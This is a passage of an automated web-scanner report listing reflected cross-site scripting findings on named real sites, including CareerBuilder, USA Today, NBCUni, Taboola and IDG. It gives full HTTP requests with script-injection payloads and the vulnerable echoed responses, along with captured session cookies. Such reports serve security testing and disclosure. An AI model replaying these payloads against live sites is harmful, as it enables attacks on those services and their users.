P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2420786125005478449; Domain=.turn.com; Expires=Fri, 02-Mar-2012 01:06:01 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:06:01 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2420786125005478449&rnd=4026326661709276972&fpid=75258"><script>alert(1)</script>9210644d738&nu=n&t=&sp=y&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

5.59. http://r.turn.com/server/pixel.htm [sp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40167"><script>alert(1)</script>eaafdf22b34 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4&sp=40167"><script>alert(1)</script>eaafdf22b34&admeld_call_type=iframe&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2925993182975414771

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2420786125005478449; Domain=.turn.com; Expires=Fri, 02-Mar-2012 01:06:02 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:06:01 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2420786125005478449&rnd=4295609569520200019&fpid=4&nu=n&t=&sp=40167"><script>alert(1)</script>eaafdf22b34&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

5.60. http://rtq.careerbuilder.com/RTQ/jobstream.aspx [lr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://rtq.careerbuilder.com
Path:   /RTQ/jobstream.aspx

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69f59'%3balert(1)//ef7e95529ce was submitted in the lr parameter. This input was echoed as 69f59';alert(1)//ef7e95529ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RTQ/jobstream.aspx?lr=CBMC_SB69f59'%3balert(1)//ef7e95529ce&rssid=MC_SB_jbstrm&num=&kw=CustomField3:SACBEETJ&cat=All&rad=50&state=&city=&zip=&ddtitle=false&ddcompany=false&sb=[&%20mi_cb_search_box%20&] HTTP/1.1
Host: rtq.careerbuilder.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: REBEL1
Date: Sun, 04 Sep 2011 00:58:11 GMT
Connection: close
Content-Length: 6632

// declaration
var cb_jobstream_title;
var cb_jobstream_title_bg
var cb_jobstream_title_font
var cb_jobstream_border;
var cb_jobstream_width;
var cb_jobstream_height;
var cb_jobstream_main_bgco
...[SNIP]...
<input type="hidden" name="lr" value="CBMC_SB69f59';alert(1)//ef7e95529ce" />
...[SNIP]...

5.61. http://rtq.careerbuilder.com/RTQ/jobstream.aspx [rssid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://rtq.careerbuilder.com
Path:   /RTQ/jobstream.aspx

Issue detail

The value of the rssid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75175'%3balert(1)//9366c27e6c8 was submitted in the rssid parameter. This input was echoed as 75175';alert(1)//9366c27e6c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RTQ/jobstream.aspx?lr=CBMC_SB&rssid=MC_SB_jbstrm75175'%3balert(1)//9366c27e6c8&num=&kw=CustomField3:SACBEETJ&cat=All&rad=50&state=&city=&zip=&ddtitle=false&ddcompany=false&sb=[&%20mi_cb_search_box%20&] HTTP/1.1
Host: rtq.careerbuilder.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: REBEL52
Date: Sun, 04 Sep 2011 00:58:14 GMT
Connection: close
Content-Length: 6632

// declaration
var cb_jobstream_title;
var cb_jobstream_title_bg
var cb_jobstream_title_font
var cb_jobstream_border;
var cb_jobstream_width;
var cb_jobstream_height;
var cb_jobstream_main_bgco
...[SNIP]...
<input type="hidden" name="siteid=" value="MC_SB_jbstrm75175';alert(1)//9366c27e6c8" />
...[SNIP]...

5.62. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/sys/jsonp.app

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 41775<script>alert(1)</script>674217f51e3 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=545853.blog&clientUrl=http%3A%2F%2Fcontent.usatoday.com%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1&cb=plcb041775<script>alert(1)</script>674217f51e3 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; SiteLifeHost=gnvm3l3pluckcom; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449799883; path=/
Cache-Control: private
Content-Length: 43049
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm6l3pluckcom
Set-Cookie: SiteLifeHost=gnvm6l3pluckcom; domain=usatoday.com; path=/
Date: Sun, 04 Sep 2011 00:45:19 GMT
Connection: close

plcb041775<script>alert(1)</script>674217f51e3('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\">
...[SNIP]...

5.63. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkey parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/sys/jsonp.app

Issue detail

The value of the plckcommentonkey request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 22e8e><img%20src%3da%20onerror%3dalert(1)>4976d325d44 was submitted in the plckcommentonkey parameter. This input was echoed as 22e8e><img src=a onerror=alert(1)>4976d325d44 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=545853.blog22e8e><img%20src%3da%20onerror%3dalert(1)>4976d325d44&clientUrl=http%3A%2F%2Fcontent.usatoday.com%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1&cb=plcb0 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; SiteLifeHost=gnvm3l3pluckcom; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449799883; path=/
Cache-Control: private
Content-Length: 34640
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm6l3pluckcom
Set-Cookie: SiteLifeHost=gnvm6l3pluckcom; domain=usatoday.com; path=/
Date: Sun, 04 Sep 2011 00:45:09 GMT
Connection: close

plcb0('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\"
...[SNIP]...
<div id=\"pluck_comments_66556\" class=\"pluck-app pluck-comm\" style=\"display:none;\" onpage=\"1\" itemsperpage=\"10\" sort=\"TimeStampAscending\" filter=\"\" commentOnKey=\"545853.blog22e8e><img src=a onerror=alert(1)>4976d325d44\" commentOnKeyType=\"article\" pagerefresh=\"false\" listtype=\"full\">
...[SNIP]...

5.64. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkeytype parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/sys/jsonp.app

Issue detail

The value of the plckcommentonkeytype request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 6aaf0><img%20src%3da%20onerror%3dalert(1)>2b3406c2615 was submitted in the plckcommentonkeytype parameter. This input was echoed as 6aaf0><img src=a onerror=alert(1)>2b3406c2615 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app&plckcommentonkeytype=article6aaf0><img%20src%3da%20onerror%3dalert(1)>2b3406c2615&plckcommentonkey=545853.blog&clientUrl=http%3A%2F%2Fcontent.usatoday.com%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1&cb=plcb0 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; SiteLifeHost=gnvm3l3pluckcom; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449799883; path=/
Cache-Control: private
Content-Length: 34978
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm6l3pluckcom
Set-Cookie: SiteLifeHost=gnvm6l3pluckcom; domain=usatoday.com; path=/
Date: Sun, 04 Sep 2011 00:44:59 GMT
Connection: close

plcb0('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\"
...[SNIP]...
_comments_83406\" class=\"pluck-app pluck-comm\" style=\"display:none;\" onpage=\"1\" itemsperpage=\"10\" sort=\"TimeStampAscending\" filter=\"\" commentOnKey=\"545853.blog\" commentOnKeyType=\"article6aaf0><img src=a onerror=alert(1)>2b3406c2615\" pagerefresh=\"false\" listtype=\"full\">
...[SNIP]...

5.65. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://snas.nbcuni.com
Path:   /snas/api/getRemoteDomainCookies

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 478ec<script>alert(1)</script>70f21925513 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback478ec<script>alert(1)</script>70f21925513 HTTP/1.1
Host: snas.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:13 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=10
Expires: Sun, 04 Sep 2011 00:50:23 GMT
Content-Length: 131
Content-Type: text/html

__nbcsnasadops.doSCallback478ec<script>alert(1)</script>70f21925513({ "cookie":{"JSESSIONID":"C58B4400F3879E26517C8A2E3ECF06E2"}});

5.66. http://sprint.tt.omtrdc.net/m2/sprint/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sprint.tt.omtrdc.net
Path:   /m2/sprint/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 574f5<script>alert(1)</script>7248981ddd2 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/sprint/mbox/standard?mboxHost=www.sprint.com&mboxSession=1315097027971-178294&mboxPage=1315097027971-178294&screenHeight=1200&screenWidth=1920&browserWidth=1233&browserHeight=1037&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=sprint-interstitial-mbox574f5<script>alert(1)</script>7248981ddd2&mboxId=0&mboxTime=1315079036636&mboxURL=http%3A%2F%2Fwww.sprint.com%2F&mboxReferrer=http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dsprint%26date%3D2011-9-3%26sa%3DX&mboxVersion=40 HTTP/1.1
Host: sprint.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1315097027971-178294.19; Domain=sprint.tt.omtrdc.net; Expires=Sun, 18-Sep-2011 00:46:21 GMT; Path=/m2/sprint
Content-Type: text/javascript
Content-Length: 220
Date: Sun, 04 Sep 2011 00:46:21 GMT
Server: Test & Target

mboxFactories.get('default').get('sprint-interstitial-mbox574f5<script>alert(1)</script>7248981ddd2',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315097027971-178294.19");

5.67. http://trc.taboolasyndication.com/reuters/trc/2/json [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /reuters/trc/2/json

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 28a5e<script>alert(1)</script>85decac219a was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /reuters/trc/2/json?tim=19%3A44%3A27.751&publisher=reuters&pv=2&list-size=3&list-id=rbox-t2v&id=353&uim=article&intent=s&uip=article&external=http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX&llvl=2&item-id=USTRE78222D20110903&item-type=text&item-url=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F03%2Fus-weather-football-idUSTRE78222D20110903&page-id=6c870e4113048a2a02755a640f72c25ab23ac976&cv=4-8-2-1-48560-3339640&uiv=default&cb=TRC.callbacks.recommendations_128a5e<script>alert(1)</script>85decac219a HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Sun, 04 Sep 2011 00:52:30 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: taboola_session_id=v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1315097030_1315097550;Path=/reuters/
Set-Cookie: JSESSIONID=.prod2-f6;Path=/
Set-Cookie: taboola_wv=;Path=/reuters/;Expires=Mon, 03-Sep-12 00:52:30 GMT
Content-Length: 3988

TRC.callbacks.recommendations_128a5e<script>alert(1)</script>85decac219a({"trc":{"req":"89ec6e2f6de78af85a24b9efb3c77a44","session-id":"cf5b371b2ea2c82fafb75969374381dc","session-data":"v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1315097030_131
...[SNIP]...

5.68. http://www.careerbuilder.com/Jobseeker/Jobs/JobResults.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /Jobseeker/Jobs/JobResults.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80ebc'-alert(1)-'94f3da384dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Jobseeker/Jobs/JobResults.aspx?80ebc'-alert(1)-'94f3da384dc=1 HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 183016
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: jobresults.aspx:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEARWEB49
Date: Sun, 04 Sep 2011 01:25:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
'Close';
var sj_isSiteDown = false;
var sj_loginUrl = 'http://www.careerbuilder.com/share/login.aspx?NextUrl=http%3a%2f%2fwww.careerbuilder.com%2fJobseeker%2fJobs%2fJobResults.aspx%3f80ebc'-alert(1)-'94f3da384dc%3d1&ff=21';
var sj_userAuthStatus = 'Unknown';
var sj_saveJobAjaxPageUrl = 'http://www.careerbuilder.com/AJAX/SaveThisJob.aspx';
</script>
...[SNIP]...

5.69. http://www.idg.com/www/rd.nsf/rd [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.idg.com
Path:   /www/rd.nsf/rd

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f740"%3b4cc57824ccb was submitted in the REST URL parameter 1. This input was echoed as 7f740";4cc57824ccb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www7f740"%3b4cc57824ccb/rd.nsf/rd HTTP/1.1
Host: www.idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Sun, 04 Sep 2011 01:26:27 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5080
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www7f740";4cc57824ccb/rd.nsf/rd");
} catch(err) {}</script>
...[SNIP]...

5.70. http://www.idg.com/www/rd.nsf/rd [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.idg.com
Path:   /www/rd.nsf/rd

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 752f0"%3b515516fa31a was submitted in the REST URL parameter 3. This input was echoed as 752f0";515516fa31a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/rd.nsf/rd752f0"%3b515516fa31a HTTP/1.1
Host: www.idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Sun, 04 Sep 2011 01:26:34 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5080
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/rd.nsf/rd752f0";515516fa31a");
} catch(err) {}</script>
...[SNIP]...

5.71. http://www.idg.com/www/rd.nsf/rd [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.idg.com
Path:   /www/rd.nsf/rd

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66e21"-alert(1)-"150c1b8488f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/rd.nsf/rd?66e21"-alert(1)-"150c1b8488f=1 HTTP/1.1
Host: www.idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Sun, 04 Sep 2011 01:26:22 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5093
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
